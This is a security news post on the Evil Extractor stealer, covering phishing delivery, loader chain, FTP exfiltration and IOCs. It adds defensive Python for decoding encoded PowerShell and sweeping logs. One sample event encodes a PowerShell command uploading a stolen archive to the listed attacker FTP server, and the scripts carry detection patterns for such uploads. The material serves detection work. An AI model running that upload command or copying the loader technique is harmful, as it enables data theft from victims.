May 11, 2024

Researchers have spotted a stealer malware called Evil Extractor, originally marketed as an educational tool, being sold to other threat actors to steal data and files from Windows systems.

It is built from several modules that all work through an FTP service, and it includes environment-checking and anti-VM functions. It primarily steals browser data and other information from compromised endpoints and uploads it to the attacker's FTP server. The majority of victims are located in Europe and the U.S.

Sold by an actor named Kodex, it is continually updated and bundles various modules that siphon system metadata, passwords and cookies from various web browsers, record keystrokes, and even act as ransomware by encrypting files on the target system.


In the new campaign, the malware is delivered through phishing emails that lure recipients into launching an executable that masquerades as a PDF document, under the pretext of confirming their account details.

The Account_Info.exe binary is an obfuscated Python program that launches a .NET loader, which in turn runs a Base64-encoded PowerShell script to start Evil Extractor. Besides gathering files, the malware can also activate the webcam and capture screenshots.
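The loader chain above ends in PowerShell started with a Base64-encoded command, which is what a defender most often sees in process-creation telemetry. The script below is an added example (not code from the Fortinet report or from the malware) that extracts the -EncodedCommand payload from a command line, decodes it the way PowerShell does (Base64 over UTF-16LE text), and flags loader and exfiltration patterns such as an FTP upload. The three process events, the indicator list and the parent/child paths are constructed for the example; the FTP server address in the first event is taken from the IOC list on this page.

```python
import base64
import binascii
import re
import shlex
from typing import Optional

# Generic loader/exfiltration patterns to look for in a decoded script. They
# follow the behaviour described in the article (encoded PowerShell, FTP
# upload) and are an assumption of this example, not Fortinet signatures.
INDICATORS = {
    "ftp_uri": re.compile(r"ftp://", re.I),
    "file_upload": re.compile(r"\.UploadFile\(|\.UploadData\(", re.I),
    "web_client": re.compile(r"Net\.WebClient", re.I),
    "nested_base64": re.compile(r"FromBase64String", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the Base64 payload given to -EncodedCommand, or None.

    PowerShell accepts any unambiguous prefix of the switch (-e, -en, -enc,
    ...) plus the -ec alias, so all of those are matched; -ExecutionPolicy
    and -ep are not prefixes of 'encodedcommand' and are ignored."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:
        tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in ("-", "/"):
            continue
        name = tok[1:].lower()
        if name == "ec" or (name and "encodedcommand".startswith(name)):
            return tokens[i + 1].strip("\"'")
    return None


def decode_powershell_payload(b64: str) -> Optional[str]:
    """-EncodedCommand carries the script as UTF-16LE, then Base64."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-16le")
    except UnicodeDecodeError:
        return raw.decode("utf-8", errors="replace")


def triage_event(event: dict) -> dict:
    """Decode any encoded command in a process-creation event and report
    which indicators fire. 'hits' is empty for benign or plain commands."""
    payload = extract_encoded_command(event["cmdline"])
    decoded = decode_powershell_payload(payload) if payload else None
    hits = [name for name, rx in INDICATORS.items() if decoded and rx.search(decoded)]
    return {
        "parent": event.get("parent"),
        "encoded": payload is not None,
        "decoded": decoded,
        "hits": hits,
        # an FTP URI alone is enough to escalate; otherwise need two patterns
        "suspicious": "ftp_uri" in hits or len(hits) >= 2,
    }


def _enc(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events (not real telemetry). The first mimics the fake
# PDF loader spawning hidden PowerShell that uploads a file to the FTP
# server listed in the IOCs; the other two are benign for comparison.
SAMPLE_EVENTS = [
    {
        "parent": r"C:\Users\victim\Downloads\Account_Info.exe",
        "cmdline": "powershell.exe -NoP -W Hidden -enc " + _enc(
            "$c=New-Object System.Net.WebClient;"
            "$c.Credentials=New-Object System.Net.NetworkCredential('ftpuser','pw');"
            "$c.UploadFile('ftp://45.87.81.184/loot.zip',"
            "'C:\\Users\\victim\\AppData\\Local\\Temp\\loot.zip')"),
    },
    {
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": "powershell.exe -EncodedCommand "
        + _enc("Get-Date | Out-File C:\\temp\\ts.txt"),
    },
    {
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
]


def triage_all(events=SAMPLE_EVENTS):
    return [triage_event(e) for e in events]


if __name__ == "__main__":
    for r in triage_all():
        print(r["parent"], "->", r["hits"] or "clean")
```

The same decode step applies to Sysmon Event ID 1 or Windows Security 4688 command lines; the point of decoding rather than alerting on the switch alone is that legitimate administration also uses -EncodedCommand, as the second sample shows.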

The report concluded that Evil Extractor is being used as a comprehensive info stealer with multiple malicious features, including ransomware. Its PowerShell script can elude detection in a .NET loader or PyArmor.

This research was documented by researchers from Fortinet.

Indicators of Compromise

  • 45[.]87[.]81[.]184
  • 193[.]42[.]33[.]232
  • 352efd1645982b8d23a841107007c8b4b024eb6bb5d6b312e5783ce4aa62b685
  • 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e
  • 75688c32a3c1f04df0fc02491180c8079d7fdc0babed981f5860f22f5e118a5e
  • 826c7c112dd1ae80469ef81f5066003d7691a349e6234c8f8ca9637b0984fc45
  • b1ef1654839b73f03b73c4ef4e20ce4ecdef2236ec6e1ca36881438bc1758dcd
  • 17672795fb0c8df81ab33f5403e0e8ed15f4b2ac1e8ac9fef1fec4928387a36d
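The indicators above are defanged with [.] so they cannot be clicked by accident, and the hashes are published in lowercase while endpoint telemetry often records them in uppercase. The script below is an added example, not part of the original post, that refangs the list, sorts it into IP and SHA-256 sets, and sweeps free-form log lines for either kind of match with case normalisation. The four Sysmon-style log lines are constructed for the example; only the IOC values themselves come from the list above.

```python
import re

# The indicators as published on this page, defanged.
DEFANGED_IOCS = [
    "45[.]87[.]81[.]184",
    "193[.]42[.]33[.]232",
    "352efd1645982b8d23a841107007c8b4b024eb6bb5d6b312e5783ce4aa62b685",
    "023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e",
    "75688c32a3c1f04df0fc02491180c8079d7fdc0babed981f5860f22f5e118a5e",
    "826c7c112dd1ae80469ef81f5066003d7691a349e6234c8f8ca9637b0984fc45",
    "b1ef1654839b73f03b73c4ef4e20ce4ecdef2236ec6e1ca36881438bc1758dcd",
    "17672795fb0c8df81ab33f5403e0e8ed15f4b2ac1e8ac9fef1fec4928387a36d",
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256 = re.compile(r"\b[0-9a-fA-F]{64}\b")


def refang(ioc: str) -> str:
    """Undo the usual defanging conventions ([.] and hxxp)."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def build_ioc_sets(defanged):
    """Split a defanged IOC list into an IPv4 set and a lowercase SHA-256 set.
    Anything that is neither is reported so it is not silently dropped."""
    ips, hashes, unknown = set(), set(), []
    for ioc in defanged:
        value = refang(ioc.strip())
        if IPV4.fullmatch(value):
            ips.add(value)
        elif SHA256.fullmatch(value):
            hashes.add(value.lower())
        else:
            unknown.append(ioc)
    return ips, hashes, unknown


def scan_log(lines, ips, hashes):
    """Return (line number, kind, value) for every IOC hit in the log lines.
    Word boundaries stop 45.87.81.184 matching inside 145.87.81.184, and
    hashes are lowered before lookup because Sysmon writes them uppercase."""
    matches = []
    for n, line in enumerate(lines, 1):
        for ip in IPV4.findall(line):
            if ip in ips:
                matches.append((n, "ip", ip))
        for h in SHA256.findall(line):
            if h.lower() in hashes:
                matches.append((n, "sha256", h.lower()))
    return matches


# Constructed Sysmon-style events (not real telemetry): one outbound FTP
# connection to a listed IP, one benign connection, one file-creation event
# carrying a listed hash in uppercase, and one with a dummy hash.
SAMPLE_LOG = [
    "2024-05-11T10:02:13Z EID=3 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "DestinationIp=45.87.81.184 DestinationPort=21",
    "2024-05-11T10:02:14Z EID=3 Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe "
    "DestinationIp=8.8.8.8 DestinationPort=443",
    "2024-05-11T09:58:40Z EID=11 Image=C:\\Users\\victim\\Downloads\\Account_Info.exe "
    "Hashes=SHA256=352EFD1645982B8D23A841107007C8B4B024EB6BB5D6B312E5783CE4AA62B685",
    "2024-05-11T09:58:41Z EID=11 Image=C:\\Windows\\explorer.exe "
    "Hashes=SHA256=" + "0" * 64,
]


def scan_sample():
    ips, hashes, _unknown = build_ioc_sets(DEFANGED_IOCS)
    return scan_log(SAMPLE_LOG, ips, hashes)


if __name__ == "__main__":
    for n, kind, value in scan_sample():
        print(f"line {n}: {kind} {value}")
```

An outbound connection to port 21 from powershell.exe is worth a look even without an IOC hit; the listed addresses will rotate, while the FTP-based exfiltration path is the part of this tooling that is harder to change.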
